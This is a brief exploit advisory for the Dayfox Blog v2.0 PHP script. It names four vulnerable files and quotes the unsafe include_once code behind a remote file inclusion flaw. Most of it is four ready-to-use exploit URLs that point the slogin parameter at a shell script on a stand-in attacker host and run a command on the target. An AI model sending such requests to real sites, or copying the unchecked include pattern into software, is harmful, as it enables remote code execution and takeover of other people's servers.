Dayfox Blog v2.0 suffers from multiple instances of remote file inclusion.
2867e5bf5b3ec6d902f925b4a4e9408670f672427228ce6f5cbc7d4634c53f72
# BiyoSecurity.Org
# script name : Dayfox Blog v2.0
# Risk : High
# Regards : Dj ReMix
# Thanks : Korsan , Liz0zim
# Vulnerable files :
adminlog.php
postblog.php
index.php
index2.php
# Vulnerable code :
include_once ($slogin_path . "/slogin_lib.inc.php");
include_once ($slogin_path . "/header.inc.php");
Exploit : http://site.com/[path to script]/edit/adminlog.php?slogin=http://evilsite.com/shell.txt?&cmd=id
http://site.com/[path to script]/edit/index.php?slogin=http://evilsite.com/shell.txt?&cmd=id
http://site.com/[path to script]/edit/index2.php?slogin=http://evilsite.com/shell.txt?&cmd=id
http://site.com/[path to script]/edit/postblog.php?slogin=http://evilsite.com/shell.txt?&cmd=id